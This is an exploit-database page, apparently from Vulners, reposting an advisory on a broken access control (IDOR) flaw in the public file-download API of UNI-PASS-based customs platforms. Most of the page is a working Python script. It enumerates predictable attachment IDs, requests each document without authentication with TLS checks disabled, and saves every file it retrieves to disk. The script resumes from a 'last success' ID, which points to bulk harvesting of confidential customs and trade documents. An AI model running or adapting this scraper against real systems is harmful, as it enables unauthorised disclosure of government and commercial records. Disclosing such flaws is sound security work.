Vulners
Lucene search
📄 UNI-PASS-Based Customs Systems Insecure Direct Object Reference
===============================================================================================================================================================================
| # Title : UNI-PASS-Based Customs Systems – Broken Access Control (BOLA/IDOR) in Public File Download API Leads to Unauthorized Document Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://unipass.customs.go.kr/csp/index.do |
================================================================================================================================================================================
[+] Summary : A critical security vulnerability has been identified in customs platforms based on UNI-PASS, where a publicly exposed API endpoint allows unauthorized access to sensitive documents without proper authentication or authorization checks.
The affected endpoint (commonly structured under /api/public/) relies on predictable object identifiers such as transaction or attachment IDs (e.g., POT2025XXXXXXXX).
Due to insufficient validation of user permissions, attackers can directly request and retrieve documents by manipulating these identifiers.
This issue represents a Broken Object Level Authorization (BOLA / IDOR) vulnerability and may lead to large-scale exposure of confidential customs data, including trade records and attached documents.
The root cause lies in trusting client-supplied parameters without enforcing ownership or session validation on the server side.
The vulnerability is especially impactful in customized UNI-PASS deployments, where inconsistent access control implementation across public APIs increases the risk of unauthorized data access.
[+] POC :
import requests
import urllib3
import os
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def march_2026_expansion():
api_url = "https://example/api/public/com/file/downloadAtchFile"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Content-Type': 'application/json',
'x-app-clsf': 'EPT',
'Referer': 'https://example/'
}
scan_list = []
for i in range(1, 201):
scan_list.append(f"POT2026{str(i).zfill(10)}")
last_success = 127699
for i in range(last_success + 1, last_success + 300):
scan_list.append(f"POT20250000{i}")
print(f"[*] Starting comprehensive scan for March 2026 files... Range: {len(scan_list)} IDs")
for file_id in scan_list:
payload = {
"atchFileId": file_id,
"atchFileSrno": 1,
"atchFileSn": 1
}
try:
res = requests.post(api_url, json=payload, headers=headers, verify=False, timeout=5)
if res.status_code == 200 and len(res.content) > 1000:
filename = f"MARCH_2026_{file_id}.pdf"
save_path = os.path.join("D:\\indoushka", filename)
with open(save_path, "wb") as f:
f.write(res.content)
print(f"[!!!] New file found! ID: {file_id} | Size: {len(res.content)//1024} KB")
except:
continue
if __name__ == "__main__":
if not os.path.exists("D:\\indoushka"):
os.makedirs("D:\\indoushka")
march_2026_expansion()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8